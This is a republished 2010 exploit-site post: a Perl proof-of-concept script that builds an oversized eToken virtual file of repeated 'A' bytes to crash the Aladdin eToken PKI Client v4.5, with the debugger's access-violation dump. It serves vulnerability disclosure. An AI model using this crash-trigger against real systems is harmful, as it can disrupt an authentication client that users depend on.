首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Aladdin eToken PKI Client v4.5 Virtual File Handling Unspecified Memory Corrupti 来源：liquidworm gmail com 作者：LiquidWorm 发布时间：2010-04-13   ====================================================================================== Aladdin eToken PKI Client v4.5 Virtual File Handling Unspecified Memory Corruption PoC ====================================================================================== #!/usr/bin/perl -w # # Title: Aladdin eToken PKI Client v4.5 Virtual File Handling Unspecified Memory Corruption PoC # # # # Summary: The eToken PKI Client is the software that enables eToken USB operation and the # implementation of eToken PKI-based solutions. These solutions include certificate-based # strong two-factor authentication, encryption and digital signing. With the PKI Client your # PKI solutions become highly secure, extremely convenient and portable, as you can easily and # securely generate and store PKI keys on-board eToken smart card-based devices. # # Vendor: Aladdin Knowledge Systems Ltd. # Product web page: http://www.aladdin.com # # Version tested: 4.5.52 # Tested on Microsoft Windows XP Professional SP3 (EN) # # # # =================================================================================== # # (154c.a74): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=00000000 ebx=00000000 ecx=00000000 edx=01730002 esi=00000000 edi=0012fc90 # eip=0045d3d3 esp=001282b0 ebp=00128304 iopl=0         nv up ei pl nz na po nc # cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202 # *** ERROR: Module load completed but symbols could not be loaded for etProps.exe # etProps+0x5d3d3: # 0045d3d3 8b8ea4000000    mov     ecx,dword ptr [esi+0A4h] ds:0023:000000a4=???????? # # =================================================================================== # # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # # Zero Science Lab - http://www.zeroscience.mk # # liquidworm gmail com # # 11.04.2010 # # Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4933.php # $fajl = "Aladdin.etv"; # eToken Virtual file $djubre = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".       "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".       "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".       "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".       "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"; open etv, ">./$fajl" || die "\nCan't open $fajl: $!"; print etv $djubre x 100; print "\n [o] Writing to file...\n"; sleep 1; close etv; print "\n [o] File $fajl created.\n";   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·vBulletin 0-day Denial Of Serv ·PHP 5.3.0 getopt() Denial of S ·VMware Remote Console e.x.p bu ·Elite Gaming Ladders <= v3.5 ( ·PHP 6.0 Dev str_transliterate( ·IE/Opera source code viewer Nu ·joelz bulletin board <= 0.9.9r ·vBulletin "Cyb - Advanced Foru ·PHP 6.0 Dev str_transliterate( ·Trellian FTP Client PASV BOF e ·MagnetoSoft DNS ActiveX DNSLoo ·Tembria Server Monitor v5.6.0   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved